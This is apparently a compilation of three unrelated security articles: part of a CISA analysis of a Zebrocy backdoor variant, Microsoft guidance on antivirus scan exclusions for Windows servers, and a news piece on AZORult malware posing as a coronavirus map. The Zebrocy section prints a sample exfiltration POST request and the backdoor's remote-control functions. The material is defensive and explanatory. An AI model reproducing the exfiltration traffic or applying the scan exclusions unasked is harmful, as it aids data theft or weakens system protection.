9eeb1eeb42e99c54c6429f9122285336.eh_fram10244.292769
d41d8cd98f00b204e9800998ecf8427e.bss00.000000
0bc884e39b3ba72fb113d63988590b5c.idata25604.424718
9bbfafc74bc296cd99dc8307ffe120ac.CRT5120.114463
2b60c482048e4a03fbb82db9c3416db5.tls5120.224820
Description

This file is a 32-bit Windows executable written using Golang programming language. The file has been identified as new variant of the Zebrocy backdoor. The file takes an argument that is supposed to be an XOR and hexadecimal encoded URI. The file cannot run using a plaintext URI as compared to the other Zebrocy backdoor binary “ba9c59783b52b93aa6dfd4cfffc16f2b”. This file and ba9c59783b52b93aa6dfd4cfffc16f2b have similar functions.

When executed, it will encrypt the URI using AES-128 ECB algorithm with a key generated from the victim’s hostname. The encrypted data is hexadecimal encoded and stored into “%AppData%\Roaming\UserData\Multimedia\Policies\3030304332393839394630353537343934453244”.

It also collects information about the victim’s system such as username, 6 bytes of current user’s SID, and time of infection. The data is encrypted and hexadecimal encoded before exfiltrated using the predefined URI.

–Begin POST request–
POST / HTTP/1.1
Host: www[.]<domain>.com
User-Agent: Go-http-client/1.1
Content-Length: 297
Content-Type: multipart/form-data; boundary=0af2fd2b7a4e61d071fa7002fb2b1472abba9bf8a33543e34ecd00d915db
Accept-Encoding: gzip

–0af2fd2b7a4e61d071fa7002fb2b1472abba9bf8a33543e34ecd00d915db
Content-Disposition: form-data; name=”filename”; filename=”04760175017f0d0d7f7706067302007f0573010204007134463136334635″
Content-Type: application/octet-stream

1
–0af2fd2b7a4e61d071fa7002fb2b1472abba9bf8a33543e34ecd00d915db–
–End POST request–

The malware is designed to encrypt future communication using an AES encryption algorithm.

The malware allows a remote operator to perform the following functions:

–Begin functions–
File manipulation such as creation, modification, and deletion
Screenshot capabilities
Drive enumeration
Command execution (using cmd.exe)
Create schedule a task for persistence manually
More
–End functions–

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  1. Maintain up-to-date antivirus signatures and engines.
  2. Keep operating system patches up-to-date.
  3. Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  4. Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  5. Enforce a strong password policy and implement regular password changes.
  6. Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  7. Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  8. Disable unnecessary services on agency workstations and servers.
  9. Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  10. Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
  11. Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  12. Scan all software downloaded from the Internet prior to executing.
  13. Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, “Guide to Malware Incident Prevention & Handling for Desktops and Laptops”.

Contact Information

  1. 1-888-282-0870
  2. CISA Service Desk (UNCLASS)
  3. CISA SIPR (SIPRNET)
  4. CISA IC (JWICS)

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://www.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

  1. Web: https://malware.us-cert.gov
  2. E-Mail: submit@malware.us-cert.gov
  3. FTP: ftp.malware.us-cert.gov (anonymous)

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA’s homepage at www.cisa.gov.

Source :
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b

Virus scanning recommendations for Enterprise computers that are running currently supported versions of Windows

Applies to:

Windows Server 2012, all editions
Windows Server 2012 R2, all editions
Windows Server 2016, all editions
Windows Server 2019, all editions
Windows 7, all editions
Windows 8.1, all editions
Windows 10, all editions

Introduction

This article contains recommendations that may help an administrator determine the cause of potential instability on a computer that is running a supported version of Microsoft Windows when it is used together with antivirus software in an Active Directory domain environment or in a managed business environment.

Note We recommend that you temporarily apply these settings to evaluate system behavior. If your system performance or stability is improved by the recommendations that are made in this article, contact your antivirus software vendor for instructions or for an updated version or settings of the antivirus software.

Important This article contains information that shows how to help lower security settings or how to temporarily turn off security features on a computer. You can make these changes to understand the nature of a specific problem. Before you make these changes, we recommend that you evaluate the risks that are associated with implementing this workaround in your particular environment. If you implement this workaround, take any appropriate additional steps to help protect the computer.

More information

For computers that are running Windows 7 and later versions of Windows

Warning This workaround may make a computer or a network more vulnerable to attack by malicious users or by malicious software such as viruses. We do not recommend this workaround but are providing this information so that you can implement this workaround at your own discretion. Use this workaround at your own risk.

Note Windows Defender automatically performs virus scanning for you, beginning in Windows Server 2016 (and Windows 10). See Configure Windows Defender Antivirus exclusions on Windows Server.

Notes

  • We are aware of the risk of excluding the specific files or folders that are mentioned in this article from scans that are made by your antivirus software. Your system will be safer if you do not exclude any files or folders from scans.
  • When you scan these files, performance and operating system reliability problems may occur because of file locking.
  • Do not exclude any one of these files based on the file name extension. For example, do not exclude all files that have a .dit extension. Microsoft has no control over other files that may use the same extensions as the files that are described in this article.
  • This article provides both file names and folders that can be excluded. All the files and folders that are described in this article are protected by default permissions to allow only SYSTEM and administrator access, and they contain only operating system components. Excluding an entire folder may be simpler but may not provide as much protection as excluding specific files based on file names.

Turn off scanning of Windows Update or Automatic Update related files

  • Turn off scanning of the Windows Update or Automatic Update database file (Datastore.edb). This file is located in the following folder:
    %windir%\SoftwareDistribution\Datastore
  • Turn off scanning of the log files that are located in the following folder:
    %windir%\SoftwareDistribution\Datastore\Logs

    Specifically, exclude the following files:

    • Edb*.jrs
    • Edb.chk
    • Tmp.edb
  • The wildcard character (*) indicates that there may be several files.

Turn off scanning of Windows Security files

  • Add the following files in the %windir%\Security\Database path of the exclusions list:
    • *.edb
    • *.sdb
    • *.log
    • *.chk
    • *.jrs
    • *.xml
    • *.csv
    • *.cmtx

    Note If these files are not excluded, antivirus software may prevent proper access to these files, and security databases can become corrupted. Scanning these files can prevent the files from being used or may prevent a security policy from being applied to the files. These files should not be scanned because antivirus software may not correctly treat them as proprietary database files.

    These are the recommended exclusions. There may be other file types that are not included in this article that should be excluded.

Turn off scanning of Group Policy-related files

  • Group Policy user registry information. These files are located in the following folder:
    %allusersprofile%\

    Specifically, exclude the following file:

    NTUser.pol
  • Group Policy client settings files. These files are located in the following folder:
    %SystemRoot%\System32\GroupPolicy\Machine\
    %SystemRoot%\System32\GroupPolicy\User\

    Specifically, exclude the following files:

    Registry.pol
    Registry.tmp

Turn off scanning of user profile files

  • User registry information and supporting files. The files are located in the following folder:
    userprofile%\

    Specifically, exclude the following files:

    NTUser.dat*

Running antivirus software on domain controllers

Because domain controllers provide an important service to clients, the risk of disruption of their activities from malicious code, from malware, or from a virus must be minimized. Antivirus software is the generally accepted way to reduce the risk of infection. Install and configure antivirus software so that the risk to the domain controller is reduced as much as possible and performance is affected as little as possible. The following list contains recommendations to help you configure and install antivirus software on a Windows Server domain controller.

Warning We recommend that you apply the following specified configuration to a test system to make sure that in your specific environment it does not introduce unexpected factors or compromise the stability of the system. The risk from too much scanning is that files are inappropriately flagged as changed. This causes too much replication in Active Directory. If testing verifies that replication is not affected by the following recommendations, you can apply the antivirus software to the production environment.

Note Specific recommendations from antivirus software vendors may supersede the recommendations in this article.

  • Antivirus software must be installed on all domain controllers in the enterprise. Ideally, try to install such software on all other server and client systems that have to interact with the domain controllers. It is optimal to catch the malware at the earliest point, such as at the firewall or at the client system where the malware is introduced. This prevents the malware from ever reaching the infrastructure systems that the clients depend on.
  • Use a version of antivirus software that is designed to work with Active Directory domain controllers and that uses the correct Application Programming Interfaces (APIs) to access files on the server. Older versions of most vendor software inappropriately change a file's metadata as the file is scanned. This causes the File Replication Service engine to recognize a file change and therefore schedule the file for replication. Newer versions prevent this problem.
    For more information, see the following article in the Microsoft Knowledge Base:

    815263 Antivirus, backup, and disk optimization programs that are compatible with the File Replication Service
  • Do not use a domain controller to browse the Internet or to perform other activities that may introduce malicious code.
  • We recommend that you minimize the workloads on domain controllers. When possible, avoid using domain controllers in a file server role. This lowers virus-scanning activity on file shares and minimizes performance overhead.
  • Do not put Active Directory or FRS database and log files on NTFS file system compressed volumes.

Turn off scanning of Active Directory and Active Directory-related files

  • Exclude the Main NTDS database files. The location of these files is specified in the following registr subkey:
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters\DSA Database File

    The default location is %windir%\Ntds. Specifically, exclude the following files:

    Ntds.dit
    Ntds.pat
  • Exclude the Active Directory transaction log files. The location of these files is specified in the following registry subkey:
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters\Database Log Files Path

    The default location is %windir%\Ntds. Specifically, exclude the following files:

    • EDB*.log
    • Res*.log
    • Edb*.jrs
    • Ntds.pat
  • Exclude the files in the NTDS Working folder that is specified in the following registry subkey:
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters\DSA Working Directory

    Specifically, exclude the following files:

    • Temp.edb
    • Edb.chk

Turn off scanning of SYSVOL files

  • Turn off scanning of files in the File Replication Service (FRS) Working folder that is specified in the following registry subkey:
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NtFrs\Parameters\Working Directory

    The default location is %windir%\Ntfrs. Exclude the following files that exist in the folder:

    • edb.chk in the %windir%\Ntfrs\jet\sys folder
    • Ntfrs.jdb in the %windir%\Ntfrs\jet folder
    • *.log in the %windir%\Ntfrs\jet\log folder
  • Turn off scanning of files in the FRS Database Log files that are specified in the following registry subkey:
    HKEY_LOCAL_MACHINE\SYSTEM\Currentcontrolset\Services\Ntfrs\Parameters\DB Log File Directory

    The default location is %windir%\Ntfrs. Exclude the following files.

    Note Settings for specific file exclusions is documented here for completeness. By default, these folders allow access only to System and Administrators. Please verify that the correct protections are in place. These folders contain only component working files for FRS and DFSR.

    • Edb*.log (if the registry key is not set)
    • FRS Working Dir\Jet\Log\Edb*.jrs
  • Turn off scanning of the NTFRS Staging folder as specified in the following registry subkey:
    HKEY_LOCAL_MACHINE\SYSTEM\Currentcontrolset\Services\NtFrs\Parameters\Replica Sets\GUID\Replica Set Stage

    By default, staging uses the following location:

    %systemroot%\Sysvol\Staging areas
  • Turn off scanning of the DFSR Staging folder as specified in the msDFSR-StagingPath attribute of the object CN=SYSVOL Subscription,CN=Domain System Volume,CN=DFSR-LocalSettings,CN=DomainControllerName,OU=Domain Controllers,DC=DomainName in AD DS. This attribute contains the path to the actual location that DFS replication uses to stage files. Specifically, exclude the following files:
    • Ntfrs_cmp*.*
    • *.frx
  • Turn off scanning of files in the Sysvol\Sysvol folder or the SYSVOL_DFSR\Sysvol folder.

    The current location of the Sysvol\Sysvol or SYSVOL_DFSR\Sysvol folder and all the subfolders is the file system reparse target of the replica set root. The Sysvol\Sysvol and SYSVOL_DFSR\Sysvol folders use the following locations by default:

    %systemroot%\Sysvol\Domain
    %systemroot%\Sysvol_DFSR\Domain
    The path to the currently active SYSVOL is referenced by the NETLOGON share and can be determined by the  SysVol value name in the following subkey:
    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Netlogon\Parameters
  • Exclude the following files from this folder and all its subfolders:
    • *.adm
    • *.admx
    • *.adml
    • Registry.pol
    • Registry.tmp
    • *.aas
    • *.inf
    • Scripts.ini
    • *.ins
    • Oscfilter.ini
  • Turn off scanning of files in the FRS Preinstall folder that is in the following location:
    Replica_root\DO_NOT_REMOVE_NtFrs_PreInstall_Directory

    The Preinstall folder is always open when FRS is running.

    Exclude the following files from this folder and all its subfolders:

    • Ntfrs*.*
  • Turn off scanning of files in the DFSR database and working folders. The location is specified by the following registry subkey:
    HKEY_LOCAL_MACHINE\SYSTEM\Currentcontrolset\Services\DFSR\Parameters\Replication Groups\GUID\Replica Set Configuration File=Path

    In this registry subkey, "Path" is the path of an XML file that states the name of the Replication Group. In this example, the path would contain "Domain System Volume."

    The default location is the following hidden folder:

    %systemdrive%\System Volume Information\DFSR

    Exclude the following files from this folder and all its subfolders:

    If any one of these folders or files is moved or is put in a different location, scan or exclude the equivalent element.

    • $db_normal$
    • FileIDTable_*
    • SimilarityTable_*
    • *.xml
    • $db_dirty$
    • $db_clean$
    • $db_lost$
    • Dfsr.db
    • Fsr.chk
    • *.frx
    • *.log
    • Fsr*.jrs
    • Tmp.edb

Turn off scanning of DFS files

The same resources that are excluded for a SYSVOL replica set must also be excluded when FRS or DFSR is used to replicate shares that are mapped to the DFS root and link targets on Windows Server 2008 R2-based or Windows Server 2008-based member computers or domain controllers.

Turn off scanning of DHCP files

By default, DHCP files that should be excluded are present in the following folder on the server:

%systemroot%\System32\DHCP

Exclude the following files from this folder and all its subfolders:

  • *.mdb
  • *.pat
  • *.log
  • *.chk
  • *.edb

The location of DHCP files can be changed. To determine the current location of the DHCP files on the server, check the DatabasePathDhcpLogFilePath, and BackupDatabasePath parameters that are specified in the following registry subkey:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DHCPServer\Parameters

Turn off scanning of DNS files

By default, DNS uses the following folder:

%systemroot%\System32\Dns

Exclude the following files from this folder and all its subfolders:

  • *.log
  • *.dns
  • BOOT

Turn off scanning of WINS files

By default, WINS uses the following folder:

%systemroot%\System32\Wins

Exclude the following files from this folder and all its subfolders:

  • *.chk
  • *.log
  • *.mdb

For computers that are running Hyper-V based versions of Windows

In some scenarios, on a Windows Server 2008-based computer that has the Hyper-V role installed or on a Microsoft Hyper-V Server 2008 or on a Microsoft Hyper-V Server 2008 R2-based computer, it may be necessary to configure the real-time scanning component within the antivirus software to exclude files and entire folders. For more information, see the following article in the Microsoft Knowledge Base:

961804 Virtual machines are missing, or error 0x800704C8, 0x80070037, or 0x800703E3 occurs when you try to start or create a virtual machine

Source :
https://support.microsoft.com/en-us/help/822158/virus-scanning-recommendations-for-enterprise-computers

Beware of ‘Coronavirus Maps’ – It’s a malware infecting PCs to steal passwords

Cybercriminals will stop at nothing to exploit every chance to prey on internet users.

Even the disastrous spread of SARS-COV-II (the virus), which causes COVID-19 (the disease), is becoming an opportunity for them to likewise spread malware or launch cyber attacks.

Reason Cybersecurity recently released a threat analysis report detailing a new attack that takes advantage of internet users' increased craving for information about the novel coronavirus that is wreaking havoc worldwide.

The malware attack specifically aims to target those who are looking for cartographic presentations of the spread of COVID-19 on the Internet, and trickes them to download and run a malicious application that, on its front-end, shows a map loaded from a legit online source but in the background compromises the computer.

New Threat With An Old Malware Component

The latest threat, designed to steal information from unwitting victims, was first spotted by MalwareHunterTeam last week and has now been analyzed by Shai Alfasi, a cybersecurity researcher at Reason Labs.

It involves a malware identified as AZORult, an information-stealing malicious software discovered in 2016. AZORult malware collects information stored in web browsers, particularly cookies, browsing histories, user IDs, passwords, and even cryptocurrency keys.

With these data drawn from browsers, it is possible for cybercriminals to steal credit card numbers, login credentials, and various other sensitive information.

AZORult is reportedly discussed in Russian underground forums as a tool for gathering sensitive data from computers. It comes with a variant that is capable of generating a hidden administrator account in infected computers to enable connections via the remote desktop protocol (RDP).

Sample Analysis

Alfasi provides technical details upon studying the malware, which is embedded in the file, usually named as Corona-virus-Map.com.exe. It's a small Win32 EXE file with a payload size of only around 3.26 MB.

Double-clicking the file opens a window that shows various information about the spread of COVID-19. The centerpiece is a "map of infections" similar to the one hosted by Johns Hopkins University, a legitimate online source to visualize and track reported coronavirus cases in the real-time.

Numbers of confirmed cases in different countries are presented on the left side while stats on deaths and recoveries are on the right. The window appears to be interactive, with tabs for various other related information and links to sources.

It presents a convincing GUI not many would suspect to be harmful. The information presented is not an amalgamation of random data, instead is actual COVID-19 information pooled from the Johns Hopkins website.

To be noted, the original coronavirus map hosted online by Johns Hopkins University or ArcGIS is not infect or backdoored in any way and are safe to visit.

The malicious software utilizes some layers of packing along with a multi-sub-process technique infused to make it challenging for researchers to detect and analyze. Additionally, it employs a task scheduler so it can continue operating.

Signs of Infection

Executing the Corona-virus-Map.com.exe results in the creation of duplicates of the Corona-virus-Map.com.exe file and multiple Corona.exe, Bin.exe, Build.exe, and Windows.Globalization.Fontgroups.exe files.

Corona-virus-Map

Additionally, the malware modifies a handful of registers under ZoneMap and LanguageList. Several mutexes are also created.

Execution of the malware activates the following processes: Bin.exe, Windows.Globalization.Fontgroups.exe, and Corona-virus-Map.com.exe. These attempt to connect to several URLs.

These processes and URLs are only a sample of what the attack entails. There are many other files generated and processes initiated. They create various network communication activities as malware tries to gather different kinds of information.

How the Attack Steals Information

Alfasi presented a detailed account of how he dissected the malware in a blog post on the Reason Security blog. One highlight detail is his analysis of the Bin.exe process with Ollydbg. Accordingly, the process wrote some dynamic link libraries (DLL). The DLL "nss3.dll" caught his attention as it is something he was acquainted with from different actors.

Corona-virus-Map

Alfasi observed a static loading of APIs associated with nss3.dll. These APIs appeared to facilitate the decryption of saved passwords as well as the generation of output data.

This is a common approach used by data thieves. Relatively simple, it only captures the login data from the infected web browser and moves it to the C:\Windows\Temp folder. It's one of the hallmarks of an AZORult attack, wherein the malware extracts data, generates a unique ID of the infected computer, applies XOR encryption, then initiates C2 communication.

The malware makes specific calls in an attempt to steal login data from common online accounts such as Telegram and Steam.

To emphasize, malware execution is the only step needed for it to proceed with its information-stealing processes. Victims don't need to interact with the window or input sensitive information therein.

Cleaning and Prevention

It may sound promotional, but Alfasi suggests Reason Antivirus software as the solution to fix infected devices and prevent further attacks. He is affiliated with Reason Security, after all. Reason is the first to find and scrutinize this new threat, so they can handle it effectively.

Other security firms are likely to have already learned about this threat, since Reason made it public on March 9. Their antiviruses or malware protection tools will have been updated as of publication time.

As such, they may be similarly capable of detecting and preventing the new threat.

The key to removing and stopping the opportunistic "coronavirus map" malware is to have the right malware protection system. It will be challenging to detect it manually, let alone remove the infection without the right software tool.

It may not be enough to be cautious in downloading and running files from the internet, as many tend to be overeager in accessing information about the novel coronavirus nowadays.

The pandemic level dispersion of COVID-19 merits utmost caution not only offline (to avoid contracting the disease) but also online. Cyber attackers are exploiting the popularity of coronavirus-related resources on the web, and many will likely fall prey to the attacks.

Source :
https://thehackernews.com/2020/03/coronavirus-maps-covid-19.html